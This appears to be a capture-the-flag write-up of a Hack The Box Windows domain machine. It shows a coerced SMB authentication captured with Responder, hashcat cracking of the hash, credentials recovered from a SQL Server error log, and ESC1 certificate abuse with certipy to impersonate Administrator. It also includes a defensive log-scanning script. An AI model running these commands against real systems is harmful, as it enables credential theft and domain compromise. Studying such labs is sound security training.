Responder Attack
We can log in to MSSQL as PublicUser but cannot use xp_cmdshell. Instead we abuse xp_dirtree, which ordinary logins are allowed to execute, to make the SQL Server service account (sql_svc) connect to an SMB server we control; Responder captures its NetNTLMv2 response, which we can then crack offline.
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.16.8\share'
subdirectory depth
------------ -----
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.8]
Responder IPv6 [dead:beef:4::1006]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-BTFEDX7IDC4]
Responder Domain Name [1R92.LOCAL]
Responder DCE-RPC Port [45323]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:556a5a7d477831c5:33B75B11E4F760CEEB28F23B2CF29A81:010100000000000000F059621AD9DB0198F3616672CAEBDB0000000002000800310052003900320001001E00570049004E002D004200540046004500440058003700490044004300340004003400570049004E002D00420054004600450044005800370049004400430034002E0031005200390032002E004C004F00430041004C000300140031005200390032002E004C004F00430041004C000500140031005200390032002E004C004F00430041004C000700080000F059621AD9DB0106000400020000000800300030000000000000000000000000300000182B65B5A88747C57166D8036E24AFD50499F40FEC449E70B88A984A4F67D7980A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0038000000000000000000
Hashcat
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt --force
SQL_SVC::sequel:556a5a7d477831c5:33b75b11e4f760ceeb28f23b2cf29a81:010100000000000000f059621ad9db0198f3616672caebdb0000000002000800310052003900320001001e00570049004e002d004200540046004500440058003700490044004300340004003400570049004e002d00420054004600450044005800370049004400430034002e0031005200390032002e004c004f00430041004c000300140031005200390032002e004c004f00430041004c000500140031005200390032002e004c004f00430041004c000700080000f059621ad9db0106000400020000000800300030000000000000000000000000300000182b65b5a88747c57166d8036e24afd50499f40fec449e70b88a984a4f67d7980a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:REGGIE1234ronnie
Good, we got another set of credentials.
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.202 5985 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)
Good! We can log in to the target machine now!
Post Exploitation
SQLServer ErrorLog Backup
*Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK
Info: Downloading C:\SQLServer\Logs\ERRORLOG.BAK to ERRORLOG.BAK
Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
It looks like Ryan accidentally typed his password into the username field: two failures from 127.0.0.1 within 40 ms, first for 'sequel.htb\Ryan.Cooper' and then for 'NuclearMosquito3', and SQL Server records the failed login name verbatim in the error log. We can verify the guess:
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3' 2>/dev/null
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
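The pattern that gave Ryan's password away, a failed logon for a real account followed a few milliseconds later from the same client by a failed logon whose "user name" is an opaque mixed-case token, is worth checking for systematically: SQL Server writes the failed login name into ERRORLOG in clear text, so every such slip leaves a credential in a file that a low-privileged service account can read, as sql_svc just did. The script below is an added example, not part of the original writeup: it runs that check over a constructed sample made of the log lines above plus two ordinary failures. The two-second window, the password-shape heuristic and the known-login list are my assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the ERRORLOG lines shown above, plus two ordinary failed logons
# (added here) so the filter has something to ignore.
SAMPLE_LOG = """\
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:50:01.10 Logon Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2022-11-18 13:52:30.00 Logon Logon failed for user 'sequel.htb\\Tom.Henn'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
"""

# Tolerates the variable column padding real ERRORLOG files use between timestamp, source and message.
FAILED_LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)
PAIR_WINDOW = timedelta(seconds=2)  # assumption: retries after a typo come within a couple of seconds


def password_like(name: str, known_logins) -> bool:
    """Heuristic for 'someone typed their password into the user field': no DOMAIN\\ or @ part,
    not a login we know exists, and a mix of upper, lower and digits."""
    if "\\" in name or "@" in name or name.lower() in known_logins:
        return False
    return (any(c.isdigit() for c in name) and any(c.isupper() for c in name)
            and any(c.islower() for c in name))


def parse_failed_logons(log_text: str):
    """Return (timestamp, user, client) for every 18456-style 'Logon failed for user' line."""
    out = []
    for line in log_text.splitlines():
        m = FAILED_LOGON_RE.match(line)
        if m:
            out.append((datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["client"]))
    return out


def find_password_in_username(log_text: str, known_logins=()):
    """Return (account, suspected_password, client) triples: a failed logon for a real-looking
    account followed within PAIR_WINDOW, from the same client, by a failed logon whose
    'user' looks like a password."""
    known = {k.lower() for k in known_logins}
    failures = parse_failed_logons(log_text)
    hits = []
    for i, (t1, user1, client1) in enumerate(failures):
        if password_like(user1, known):
            continue
        for t2, user2, client2 in failures[i + 1:]:
            if t2 - t1 > PAIR_WINDOW:
                break
            if client2 == client1 and password_like(user2, known):
                hits.append((user1, user2, client1))
    return hits


if __name__ == "__main__":
    for account, secret, client in find_password_in_username(SAMPLE_LOG, known_logins=["sa"]):
        print(f"{account} probably typed {secret!r} into the user field from {client}")
```

Point it at a real ERRORLOG or ERRORLOG.BAK and populate known_logins from `SELECT name FROM sys.server_principals` so that legitimate mixed-case login names are not flagged.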
Ryan.Cooper can enroll in the UserAuthentication template, and the template lets the enrollee supply the subject alternative name (the ESC1 misconfiguration), so we request a certificate carrying the Administrator UPN:
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad req -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip '10.10.11.202' -template 'UserAuthentication' -target 'dc.sequel.htb' -upn 'Administrator@sequel.htb' -ca 'sequel-DC-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Error again. KDC_ERR_PADATA_TYPE_NOSUPP means the KDC refused PKINIT pre-authentication as such, not our certificate, and the nmap scan points at the most likely cause: the DC's own certificate from sequel-DC-CA expired on 2023-11-18, and a KDC needs a valid certificate of its own to complete the PKINIT exchange. The certificate we hold is still usable over Schannel (LDAPS), which does not depend on PKINIT; Certipy's auth -ldap-shell option does that. This writeup does not pursue it further. For reference, this is what the same step produced in 0xdf's writeup (Certipy 4.4.0, while the DC certificate was still valid):
oxdf@hacky$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee